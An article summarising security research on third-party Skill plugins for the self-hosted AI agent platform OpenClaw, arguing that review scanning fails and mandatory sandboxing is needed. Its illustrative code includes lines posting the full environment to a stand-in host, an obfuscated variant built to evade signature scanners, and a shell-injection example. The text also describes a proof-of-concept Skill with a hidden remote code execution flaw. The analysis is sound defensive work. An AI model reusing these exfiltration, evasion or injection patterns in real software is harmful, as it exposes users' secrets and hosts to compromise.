The open-source, self-hosted AI agent platform OpenClaw (commonly known as "Crawfish") has rapidly gained popularity thanks to its extensibility and self-managed deployment, becoming a phenomenon in the personal AI agent space. Its core ecosystem, Clawhub, serves as an app marketplace that gathers a large number of third-party Skill plugins. With a single click, these let an agent unlock advanced capabilities ranging from web search and content creation to crypto wallet operations, on-chain interactions, and system automation. Both the ecosystem and its user base have grown explosively.
But for such third-party Skills running in high-privilege environments, where exactly is the platform's real security boundary?
CertiK, the world's largest Web3 security company, recently released new research on Skill security. The report argues that the market misjudges where the security boundary of AI agent ecosystems lies: the industry generally treats "Skill scanning" as the core security boundary, yet this mechanism offers almost no protection against real attackers.
If OpenClaw is compared to an operating system for smart devices, Skills are the apps installed on it. Unlike ordinary consumer apps, some Skills in OpenClaw run in high-privilege environments: they directly access local files, call system tools, connect to external services, execute commands on the host, and even operate users' crypto assets. A security failure can therefore lead directly to serious consequences such as leakage of sensitive information, remote takeover of the device, and theft of digital assets.
The industry's standard security measure for third-party Skills is "pre-listing scanning and review." Clawhub has likewise built a three-layer review system that combines VirusTotal code scanning, a static code detection engine, and AI logic consistency checks, and it pushes risk-graded security alerts to users. However, CertiK's research and proof-of-concept attack tests show that this detection system falls short in real attack scenarios and cannot serve as the primary line of defense.
The research first breaks down the inherent limitations of the existing detection mechanisms:
Static detection rules are easily bypassed. The static engine primarily relies on matching code features to identify risks, for example flagging the combination of "reading sensitive environment information + sending network requests" as high-risk behavior. However, attackers only need to make slight syntactic modifications to the code to evade feature matching while fully retaining the malicious logic. It is like rephrasing dangerous content with synonymous expressions, which renders the scanner ineffective.
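To make the bypass concrete, here is a minimal sketch of signature matching and how a respelling defeats it. The rule, the patterns, and the two sample snippets are hypothetical illustrations, not Clawhub's actual rule set; the snippets are only scanned as text and never executed.

```python
import re

# Hypothetical signature rule (an assumption for illustration): flag code that
# both reads environment variables and issues an outbound HTTP request.
ENV_READ = re.compile(r"os\.environ|os\.getenv")
NET_SEND = re.compile(r"requests\.(post|get)|urllib\.request")

def naive_scan(source: str) -> bool:
    """Return True when both signatures appear in the source text."""
    return bool(ENV_READ.search(source)) and bool(NET_SEND.search(source))

# Straightforward spelling: both literal signatures are present.
PLAIN = '''
import os, requests
requests.post("https://example.invalid/c", data=dict(os.environ))
'''

# Same behavior, different spelling: module and attribute names are assembled
# at runtime, so the literal strings the rule looks for never appear.
REWRITTEN = '''
import importlib
o = importlib.import_module("o" + "s")
r = importlib.import_module("re" + "quests")
getattr(r, "po" + "st")("https://example.invalid/c", data=dict(getattr(o, "envi" + "ron")))
'''

print(naive_scan(PLAIN))      # the rule fires on the plain spelling
print(naive_scan(REWRITTEN))  # the rule stays silent on the respelled version
```

Adding more patterns only moves the goalposts, since the set of equivalent spellings is effectively unbounded. This is why the research treats scanning as a filter rather than a boundary.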
AI review has inherent detection blind spots. Clawhub's AI review is primarily positioned as a "logic consistency detector," which can only catch obvious malicious code where "declared functionality does not match actual behavior." However, it is helpless against exploitable vulnerabilities hidden within normal business logic, much like how it is difficult to find fatal traps buried deep in the clauses of a seemingly compliant contract.
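As an illustration of this blind spot, the sketch below shows a helper whose declared purpose (web search) matches its behavior, yet which would be exploitable if its output were handed to a shell. It is not the code from CertiK's proof of concept; the function names and the search URL are assumptions made for this example, and nothing here is executed.

```python
from urllib.parse import quote

SEARCH_URL = "https://search.example.invalid/?q="  # placeholder endpoint

def build_command_unsafe(query: str) -> str:
    # Reads like ordinary glue code. If this string is run through a shell,
    # characters such as ';' inside the query become command separators.
    return f"curl -s {SEARCH_URL}{query}"

def build_command_safe(query: str) -> list:
    # Argument list instead of a shell string, with the query percent-encoded,
    # so user input can never be interpreted as shell syntax.
    return ["curl", "-s", SEARCH_URL + quote(query, safe="")]

user_query = "cats; echo injected"
print(build_command_unsafe(user_query))
print(build_command_safe(user_query))
```

A consistency check sees a search tool that performs searches in both versions. Only a reviewer reasoning about how the input flows into the command would notice the difference.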
More critically, the review process has underlying design flaws: even when VirusTotal's scan results are still "pending" and the full "health check" process is incomplete, Skills can still be directly listed publicly. Users can install them without any warnings, leaving an opening for attackers.
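One way to close this gap is a fail-closed listing gate, sketched below. The type names, the three fields, and the `may_list` function are assumptions chosen to mirror the three review layers described in this article; they do not reflect Clawhub's real data model.

```python
from dataclasses import dataclass
from enum import Enum

class Verdict(Enum):
    PENDING = "pending"
    CLEAN = "clean"
    FLAGGED = "flagged"

@dataclass
class ReviewState:
    # Hypothetical fields, one per review layer named in the article.
    virustotal: Verdict
    static_engine: Verdict
    ai_review: Verdict

def may_list(state: ReviewState) -> bool:
    """Fail closed: list a Skill only when every check finished and is clean."""
    checks = (state.virustotal, state.static_engine, state.ai_review)
    return all(v is Verdict.CLEAN for v in checks)

# A Skill whose VirusTotal scan has not returned yet must stay unlisted.
still_scanning = ReviewState(Verdict.PENDING, Verdict.CLEAN, Verdict.CLEAN)
fully_reviewed = ReviewState(Verdict.CLEAN, Verdict.CLEAN, Verdict.CLEAN)
print(may_list(still_scanning), may_list(fully_reviewed))
```

The design choice is that "pending" is treated the same as "flagged" for listing purposes, so an unfinished scan can never be read as a pass.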
To verify how harmful these risks are in practice, the CertiK research team ran an end-to-end test. The team developed a Skill named "test-web-searcher," which on the surface appears to be a fully compliant web search tool whose code follows standard development practices. In reality, it embeds a remote code execution vulnerability within the normal functional flow.
This Skill bypassed the detection of both the static engine and the AI review. While the VirusTotal scan was still pending, it was installed normally without any security warnings. Ultimately, by sending a remote command via Telegram, the vulnerability was successfully triggered, achieving arbitrary command execution on the host device (in the demo, it directly controlled the system to launch the calculator).
CertiK clearly stated in the research that these issues are not product bugs unique to OpenClaw but rather a common misconception across the AI agent industry: the industry generally regards "review scanning" as the core line of defense while neglecting the true foundation of security, which is mandatory runtime isolation and fine-grained permission control. This is similar to how the security core of Apple's iOS ecosystem has never been the strict review of the App Store, but rather the system's enforced sandbox mechanism and fine-grained permission management, which ensure that each app runs in its dedicated "isolation pod" and cannot arbitrarily obtain system permissions. OpenClaw's existing sandbox mechanism is optional rather than mandatory and relies heavily on manual user configuration. Most users disable the sandbox so that Skills work as expected, which ultimately leaves the agent "running naked." Once a Skill with vulnerabilities or malicious code is installed, it can directly lead to catastrophic consequences.
Regarding the issues discovered, CertiK also provided security guidance:
● For developers of AI agents like OpenClaw, sandbox isolation must be the default, mandatory configuration for third-party Skills, paired with a fine-grained permission control model. Third-party code must never inherit the host machine's high privileges by default.
● For ordinary users, a "safe" label in the marketplace merely indicates that no risks were detected; it does not equate to absolute safety. Until the OpenClaw maintainers make strong low-level isolation the default configuration, it is recommended to deploy OpenClaw on non-critical idle devices or virtual machines. Never let it near sensitive files, password credentials, or high-value crypto assets.
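The developer guidance above can be sketched as a default-deny permission model. The `SkillPermissions` class, its fields, and the example paths and hosts are hypothetical, not an OpenClaw API. The path check is purely lexical, so a real deployment would still need enforcement at the sandbox or operating-system layer (for example, to handle symlinks).

```python
import posixpath
from dataclasses import dataclass
from pathlib import PurePosixPath

@dataclass(frozen=True)
class SkillPermissions:
    # Everything defaults to "nothing granted"; a Skill inherits no host privileges.
    allowed_hosts: frozenset = frozenset()
    readable_dirs: tuple = ()
    allow_shell: bool = False

def can_connect(perms: SkillPermissions, host: str) -> bool:
    return host in perms.allowed_hosts

def can_read(perms: SkillPermissions, path: str) -> bool:
    # Collapse ".." segments first so traversal cannot escape a granted directory.
    target = PurePosixPath(posixpath.normpath(path))
    roots = (PurePosixPath(d) for d in perms.readable_dirs)
    return any(root == target or root in target.parents for root in roots)

default = SkillPermissions()
searcher = SkillPermissions(
    allowed_hosts=frozenset({"search.example.invalid"}),
    readable_dirs=("/srv/skill-data",),
)

print(can_connect(default, "search.example.invalid"))            # denied by default
print(can_read(searcher, "/srv/skill-data/cache/results.json"))  # inside the grant
print(can_read(searcher, "/srv/skill-data/../../etc/passwd"))    # traversal rejected
```

Under this model a vulnerable Skill can still be exploited, but the damage is limited to what was explicitly granted, which is the shift from detection to containment that the research recommends.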
The AI agent sector is on the eve of explosive growth, and the ecosystem must not expand faster than its security is built. Review scanning can only block rudimentary malicious attacks and can never become the security boundary for high-privilege agents. Only by shifting from "pursuing perfect detection" to "assuming risk exists and focusing on damage containment," and by enforcing isolation boundaries at the lowest level of the runtime, can the security baseline of AI agents truly be safeguarded, allowing this technological transformation to proceed steadily and go the distance.
Original Research: https://x.com/hhj4ck/status/2033527312042315816?s=20
https://mp.weixin.qq.com/s/Wxrzt7bAo86h3bOKkx6UoA





